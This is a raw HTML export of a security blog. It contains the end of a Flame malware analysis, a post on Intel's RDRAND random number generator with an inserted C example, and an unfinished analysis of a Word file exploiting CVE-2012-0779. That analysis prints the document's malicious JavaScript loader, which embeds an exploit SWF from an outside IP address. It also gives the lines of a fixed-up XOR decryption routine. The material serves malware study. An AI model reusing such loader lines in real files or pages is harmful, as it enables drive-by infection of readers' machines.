<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">But now we are in a very special function:</span></div>
</span><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100033A4</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> UpdateTBSList proc near</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">It is an exported function, but even knowing that does not let us retrieve the key, because it is not called from within the executable module itself...!</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Here is a visual representation of the whole analysis we have done:</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD1gyMid2YfEOTt6W3CYF88mmML3_7ASLhX_mdPbeFHbzRP7gKGjvRfp1CQeUJemQ4nZDc4EFES859xHRJ-O4kyi0sSQnqE6FL0S5zEH-COxMDNfwexg3evvkz0_kL4a_TPhJDTuZj3l0/s1600/schema5-1.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="448" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD1gyMid2YfEOTt6W3CYF88mmML3_7ASLhX_mdPbeFHbzRP7gKGjvRfp1CQeUJemQ4nZDc4EFES859xHRJ-O4kyi0sSQnqE6FL0S5zEH-COxMDNfwexg3evvkz0_kL4a_TPhJDTuZj3l0/s640/schema5-1.bmp" width="640" /></a></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">I hope this discussion has given you an idea of how much this kind of structured code can complicate things... although we went very deep into the code to track the key back, even at the end of our analysis we didn't find its value!</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Are we close to it? Mmm... close enough at least :P</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">I'm not going to describe every single detail, but let's just think of the next logical step.</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">You may think about looking for the call to "UpdateTBSList" in the other components of Flame, but you won't find anything because the strings are encrypted! So, first you have to decrypt the strings and then you can look in every component of the malware to find where the export is called :)</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">But, even knowing that... once you have finally retrieved the key... what is it useful for? Was this time-consuming effort worth it?</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Well, it definitely is, but to understand why you would have to investigate further... :) This "never-ending task" shows the direction malware analysis has been taking in recent years: a lot of effort, patience and dedication is required to perform even a small analysis like this one!</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
</span><br />
<br /></div>
</span></span></div>
</span></div>
</span></span></div>
</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span></div>
</span></span></span></span></div>
</div>giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-25711078846299573832012-05-22T16:03:00.000-07:002012-11-07T06:34:45.513-08:00A wide view of the Intel Digital Random Number Generator (DRNG)<span class="Apple-style-span" style="line-height: 23px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">L</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">et's focus on two important lessons security history has taught us over the years:</span><br />
<ul>
<li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Cryptography relies heavily on random numbers</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Implementing cryptography in the right way is not easy</span></li>
</ul>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">To point out and stress these concepts, I would like to recall a significant episode... Do you remember the </span><a href="http://digitaloffense.net/tools/debian-openssl/"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Debian/OpenSSL Fiasco</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> of 2008? Briefly, as a side effect of some modifications to the code, the only "random" value used to seed the PRNG was the current process ID.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This resulted in the PRNG having only 32,767 different possible seed values (i.e. the default maximum process ID on Linux systems), which means... a lot of people using the same keys to perform sensitive operations! Or, in other words, as a famous quote by Robert Coveyou says: "random number generation is too important to be left to chance".</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So, wouldn't it be nice if we could rely on a high-quality standard implementation that is also performant, reliable under worst-case assumptions and secure against software attacks? Yes, of course. Is it possible? Well, lucky day... yes, it is!</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The news is quite recent and comes from Intel, which developed a </span><a href="http://software.intel.com/en-us/articles/intel-digital-random-number-generator-drng-software-implementation-guide/"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Digital Random Number Generator</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> (DRNG) following the Cascade Construction RNG model (although <a href="http://spectrum.ieee.org/computing/hardware/behind-intels-new-randomnumber-generator/">this isn't Intel's first attempt to provide an RNG</a>). </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh548tCoHK6vxIWjzjmSvc15a8xK1aPyluIBghyxf-T0EASME2SJYnXftJlH00P3wOWscrfSWzi6PZfcgotwxTaK8NAzViE7vGA2YBLuNHuJHmQ4SUht_eY-JcCOp1IkfhTOHvmFJXB470/s1600/43773-drng-figure-1-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh548tCoHK6vxIWjzjmSvc15a8xK1aPyluIBghyxf-T0EASME2SJYnXftJlH00P3wOWscrfSWzi6PZfcgotwxTaK8NAzViE7vGA2YBLuNHuJHmQ4SUht_eY-JcCOp1IkfhTOHvmFJXB470/s400/43773-drng-figure-1-1.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The input is taken from an entropy source in order to supply an entropy pool. This pool is then used to provide nondeterministic random numbers that repeatedly seed a Cryptographically Secure PRNG (CSPRNG). Finally, the CSPRNG generates cryptographically secure random numbers.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Intel's DRNG is implemented in hardware on the processor itself, so the entropy source is built-in and is, indeed, a reliable source of high-quality entropy.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The implementation consists of three logical components that correspond to the ones described above, except that the entropy pool is replaced by a conditioner to improve performance.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAyweNUIeMPXo2MweffVRDAPKe3LlFnZj_q-N690PRKw0NJ0RslFedAkHOVuGdMi8Z23ar8lEjEX2S_57_9RlwTdCP3eeeaQsL0Ig9Y-1WKNwyUyDbtggWFsQlWeN786vEr575DwZKPX8/s1600/43775-drng-figure-3-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAyweNUIeMPXo2MweffVRDAPKe3LlFnZj_q-N690PRKw0NJ0RslFedAkHOVuGdMi8Z23ar8lEjEX2S_57_9RlwTdCP3eeeaQsL0Ig9Y-1WKNwyUyDbtggWFsQlWeN786vEr575DwZKPX8/s400/43775-drng-figure-3-1.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Here is how it is structured: </span><br />
<br />
<ul>
<li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The entropy source uses thermal noise in the silicon to generate streams of random bits, which are then fed to an AES-CBC-MAC based conditioner. </span></li>
<li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The conditioner combines pairs of 256-bit blocks from the entropy source and produces one 256-bit block that seeds the AES-CTR based Deterministic Random Bit Generator (DRBG), which is the hardware CSPRNG. </span></li>
<li><span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The DRBG increases the number of random bytes available from the hardware module: it generates long streams of bytes from each seed, thus raising the overall throughput of random bytes.</span></span></li>
</ul>
<br />
<div>
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Note that the use of block ciphers in this context is not a novelty: it is a </span><a href="http://csrc.nist.gov/groups/ST/toolkit/documents/rng/BlockCipherDRBGs.pdf"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">common approach in PRNG construction</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">, as modern block ciphers are designed to behave as good pseudo-random permutations.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="color: #1e1e1e;"></span></span><span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Also, the hardware approach adopted by Intel gives additional advantages as the self-contained hardware module is isolated from software attacks on its internal state. </span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">How does a user interface with the DRNG? A new </span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Intel 64 instruction is introduced: RDRAND. <a href="http://software.intel.com/en-us/articles/intel-digital-random-number-generator-drng-software-implementation-guide/">Intel documentation</a> provides all the necessary details on its usage, and on how to determine whether the underlying platform supports the instruction (this can be done with the CPUID instruction).</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Basically, RDRAND can be invoked to obtain a 16-, 32-, or 64-bit random integer value. For example, "RDRAND eax" stores a 32-bit random number in eax.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">After calling it, the carry flag will be 1 if a random value was available at the time the RDRAND instruction was executed, or 0 if it wasn't.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">It seems that Intel is spending a lot of effort on providing crypto-dedicated instructions (remember the </span><a href="http://software.intel.com/en-us/articles/intel-advanced-encryption-standard-aes-instructions-set/"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">AES instruction set</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">?) and I hope this trend will bring us many more. I think it will take some years for this implementation to spread and become popular, but I also think it may be the solution to many practical problems in everyday cryptography: good work, Intel!</span></div>
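To make the CPUID check and the carry-flag protocol concrete, here is an added C example (my own code, not Intel's and not part of the original post). It tests CPUID.01H:ECX bit 30 for RDRAND, issues the instruction through inline assembly and reads CF with setc, and wraps it in the retry loop Intel's guide recommends (10 attempts is the figure used here). The function-pointer "step" source and the simulated DRNG that fails a configurable number of times are assumptions made so the retry logic can be exercised on any machine, including non-x86 ones where the hardware path is compiled out.

```c
/* Added example (not Intel's code nor from the original post): checking
 * CPUID for RDRAND support and wrapping the instruction in a retry loop.
 * The function-pointer "step" source and the simulated DRNG below are
 * assumptions made here so the retry logic can run without the instruction. */
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>
#define HAVE_X86 1
#else
#define HAVE_X86 0
#endif

/* Returns 1 when CPUID.01H:ECX bit 30 (RDRAND) is set, 0 otherwise. */
int rdrand_supported(void)
{
#if HAVE_X86
    unsigned int eax, ebx, ecx, edx;
    if (!__get_cpuid(1, &eax, &ebx, &ecx, &edx))
        return 0;
    return (ecx & (1u << 30)) != 0;
#else
    return 0;
#endif
}

/* One RDRAND attempt. CF is 1 when a random value was available and 0 when
 * it was not: the value goes to *out, CF is the return value. */
int rdrand32_step(uint32_t *out)
{
#if HAVE_X86
    unsigned char ok;
    uint32_t val;
    __asm__ volatile("rdrand %0\n\tsetc %1" : "=r"(val), "=qm"(ok) : : "cc");
    *out = val;
    return ok;
#else
    (void)out;
    return 0;
#endif
}

/* Retry loop: calls step() up to `retries` times and stops at the first
 * CF=1. Returns 1 on success, 0 if every attempt reported CF=0. */
int rdrand_retry(int (*step)(uint32_t *), int retries, uint32_t *out)
{
    for (int i = 0; i < retries; i++) {
        if (step(out))
            return 1;
    }
    return 0;
}

/* Constructed simulation of a DRNG that reports CF=0 for the first
 * `sim_failures_left` calls and then hands back a fixed constructed value. */
static int sim_failures_left = 0;
static int sim_step(uint32_t *out)
{
    if (sim_failures_left > 0) {
        sim_failures_left--;
        return 0;
    }
    *out = 0x12345678u; /* constructed value, not entropy */
    return 1;
}

/* Runs the retry loop against the simulation; returns the value obtained,
 * or 0 when all retries reported CF=0. */
uint32_t simulate_rdrand(int failures, int retries)
{
    uint32_t v = 0;
    sim_failures_left = failures;
    return rdrand_retry(sim_step, retries, &v) ? v : 0;
}

/* Real hardware path: -1 if RDRAND is unsupported here, 1 if a value was
 * obtained within 10 retries, 0 if all 10 attempts failed. */
int rdrand_hw_works(void)
{
    uint32_t r;
    if (!rdrand_supported())
        return -1;
    return rdrand_retry(rdrand32_step, 10, &r);
}

int main(void)
{
    uint32_t r;
    if (!rdrand_supported()) {
        puts("RDRAND not supported on this CPU");
        return 1;
    }
    if (rdrand_retry(rdrand32_step, 10, &r))
        printf("RDRAND -> 0x%08x\n", r);
    else
        puts("RDRAND returned CF=0 ten times; treat the DRNG as unavailable");
    return 0;
}
```

The point of the retry loop is that a single CF=0 is not an error: it only means no value was ready at that instant. Giving up after a bounded number of attempts, rather than spinning forever or silently using a stale register, is what keeps the caller from treating an unavailable generator as a source of randomness.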
<br />
<br />giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com4tag:blogger.com,1999:blog-8573685359056491736.post-64436500070077232942012-05-13T18:26:00.002-07:002012-05-14T00:08:29.885-07:00A look at object confusion vulnerability (CVE-2012-0779) in Adobe Flash<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Recently I noticed an interesting blog entry in <a href="http://contagiodump.blogspot.it/2012/05/may-3-cve-2012-0779-world-uyghur.html">contagiodump</a>: it was about a new attack using <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0779">CVE-2012-0779</a>, which involves an MS Word file named "World Uyghur Congress Invitation.doc". It got me curious, so I started analysing it.</span><br />
<div>
<br /></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">To investigate this file I used <a href="http://www.mcafee.com/us/downloads/free-tools/fileinsight.aspx">FileInsight</a>, a simple hex editor that supports the OLE format. I looked inside the object in the ObjectPool field and found some useful information.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">In particular, you can find this object in the CompObj stream:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhbNTUa0tSeUsDSp0GGCyDKUjC4j3IGRR_gLq0sE5z1hwboy7T6si3Qd8C3IUfHR0RqmoTyxnL4C4Nvte0xnKahKt2_XgFluE3ylmYjfA8P4UaD-PKOTTOPnqkVzU-7Fcr68v6PMVv6EY/s1600/img3-1.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhbNTUa0tSeUsDSp0GGCyDKUjC4j3IGRR_gLq0sE5z1hwboy7T6si3Qd8C3IUfHR0RqmoTyxnL4C4Nvte0xnKahKt2_XgFluE3ylmYjfA8P4UaD-PKOTTOPnqkVzU-7Fcr68v6PMVv6EY/s640/img3-1.bmp" width="640" /></a></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">and a CLSID in the OCXDATA stream:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-EOvOX42HG1Ew51BnW1pvbQPxJg5qahyukEavkLNKFxyod_WxhRrMpK-kAVQy4thjFFGqIXqoI8PfaNh2xWlecX3EJp_qMRNsFjhW4hqMDd5ZnpHOZtkNn1jgdePC6jHMoctRdFxatuA/s1600/img1-1.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-EOvOX42HG1Ew51BnW1pvbQPxJg5qahyukEavkLNKFxyod_WxhRrMpK-kAVQy4thjFFGqIXqoI8PfaNh2xWlecX3EJp_qMRNsFjhW4hqMDd5ZnpHOZtkNn1jgdePC6jHMoctRdFxatuA/s640/img1-1.bmp" width="640" /></a></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Also, in the last screenshot you can notice JavaScript code containing a URL that points to a Flash file:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="color: #1e1e1e; line-height: 20px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">javascript:eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000%3E%3C/embed%3E')))</span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e; line-height: 20px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">I searched for this data and discovered that ScriptBridge is the name for AE24FDAE-03C6-11D1-8B76-0080C744F389, and found a </span><a href="http://blogs.technet.com/b/srd/archive/2009/03/03/behavior-of-activex-controls-embedded-in-office-documents.aspx"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">nice article</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> explaining that this CLSID allows navigation to a URL without requiring any user interaction. This is a really powerful feature for malicious purposes!</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now let's focus on "essais.swf". This is a CWS file (a compressed SWF file), but we don't need to care about this detail, as opening it with <a href="http://www.flash-decompiler.com/">Trillix</a> will unpack it by default.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This file is encoded with DoSwf:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqjhyphenhyphen7wtx36FNuS8kfJySGxGcnfc2QFX-FqfOgtkqmZuB_oJUuwJO4jvXAwIxFyb5aH2iZPR9mgsvTXFfNJbvh75tsuAdyeXwBkKMN4OYlixfJ3XXW11mQQBajysEBa4tC6QS8KnltsRI/s1600/img4.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqjhyphenhyphen7wtx36FNuS8kfJySGxGcnfc2QFX-FqfOgtkqmZuB_oJUuwJO4jvXAwIxFyb5aH2iZPR9mgsvTXFfNJbvh75tsuAdyeXwBkKMN4OYlixfJ3XXW11mQQBajysEBa4tC6QS8KnltsRI/s640/img4.bmp" width="640" /></a></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">We need to unpack the DoSwf layer in order to get to the exploit code, but Trillix fails at decompiling the ActionScript of the packed Flash file. So I searched for other similar Flash files related to this attack, and found "exp.swf" on the <a href="http://jsunpack.jeek.org/?report=48b3c77f602abc635f520eafb4690cc160e3acdd">jsunpack website</a>.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This time Trillix is able to show us the decompiled ActionScript code of the packer:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhol0jC1t0KzhWgzgSL9JII3r29GXFaXbTa6YoO5JjLZGe99uu2b_j_Wya7SgyuvmbSsTnokxhlN3s7M8JTAAe9HchvTXcU8EBP_iZ1AkwmwJyyjlbDpU_mAZqpYwyAIJMKbso0bYDks9M/s1600/img5.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhol0jC1t0KzhWgzgSL9JII3r29GXFaXbTa6YoO5JjLZGe99uu2b_j_Wya7SgyuvmbSsTnokxhlN3s7M8JTAAe9HchvTXcU8EBP_iZ1AkwmwJyyjlbDpU_mAZqpYwyAIJMKbso0bYDks9M/s640/img5.bmp" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Here we go, this code shows an XOR encryption! Searching for a decryption script I found </span><a href="https://gist.github.com/1509527/d3dca7ed75d090b68e4a3d84d1129923a9800390"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">this one</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">, but it doesn't work as it is.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So,</span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> I rearranged the code to make it work with this sample. I only had to use the "decrypt" function properly, and fix the following lines:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">byte block_size = (byte) (buffer.get() - 1);</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">byte key = (byte) (buffer.get() - 1);</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int offset = buffer.getInt() - 2;</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int length = buffer.getInt() - 2;</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Once decrypted and decompressed, the result is a file containing three concatenated Flash files. The first and third Flash files come from DoSWF and only contain some metadata and license information. The original malicious Flash file is the second one, and you can find it <a href="http://pastebin.com/fbPRL3ih">here</a> (thanks to contagiodump for the link).</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This is our final exploit! If we take a look at the code we find: a shellcode (line 23); a heap spray (line 133); some other things including cookie usage, an RTMP connection and some checks on the Windows version.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">I'm unable to determine where the vulnerability is: maybe the exploit works only under certain software conditions, or maybe the RTMP connection is involved in some way, or there's some other missing detail... I don't know! I think that I haven't got enough information to fully understand what happens, but at least this gives an idea of how the attack is structured: more complicated than the usual .doc based attacks!</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
